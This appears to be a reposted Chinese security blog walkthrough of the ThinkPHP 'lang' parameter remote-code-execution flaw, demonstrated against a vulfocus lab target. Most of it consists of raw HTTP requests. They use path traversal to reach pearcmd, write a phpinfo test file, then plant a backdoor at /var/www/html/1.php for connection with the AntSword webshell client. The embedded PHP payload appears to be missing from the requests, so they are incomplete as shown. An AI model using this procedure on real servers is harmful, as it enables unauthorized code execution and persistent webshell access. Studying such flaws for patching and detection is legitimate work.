Thinkphp6-Lang-rce

admin 2023年1月3日09:56:52评论247 views字数 1537阅读5分7秒阅读模式

个人测试成功上传,该项目中出现的地址均为vulfocus靶场地址。靶场地址为:https://vulfocus.cn/#/dashboard

由于该漏洞有多种方法,在此我只是分享其中一种方法,大佬勿喷。还在学习中的一个小白。上传检测的脚本只限内查使用,如出现问题个人承担后果。由于脚本是网络收集,如有侵权请联系作者删除。联系qq:2831258873

漏洞描述
如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

影响范围
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x

第一步:测试环境是否在影响范围之中
Thinkphp6-Lang-rce

第二步:尝试上传一个phpinfo并访问
GET /public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/+/tmp/hello.php HTTP/1.1
Host: 123.58.224.8:42571
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Cookie: think-lang:zh-cn
Upgrade-Insecure-Requests: 1

Thinkphp6-Lang-rce

尝试访问,出现phpinfo的页面则成功
http://123.58.224.8:42571/public/index.php?lang=../../../../../../../../tmp/hello 

Thinkphp6-Lang-rce

尝试上传后门
GET /public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/+/var/www/html/1.php HTTP/1.1
Host: 123.58.224.8:42571
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1

Thinkphp6-Lang-rce

尝试用蚁剑进行连接 

Thinkphp6-Lang-rce




关 注 有 礼



欢迎关注公众号:网络安全者

获取每日抽奖送书

Thinkphp6-Lang-rce

       

本文内容来自网络,如有侵权请联系删除

Thinkphp6-Lang-rce


原文始发于微信公众号(网络安全者):Thinkphp6-Lang-rce

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月3日09:56:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Thinkphp6-Lang-rcehttps://cn-sec.com/archives/1495655.html

发表评论

匿名网友 填写信息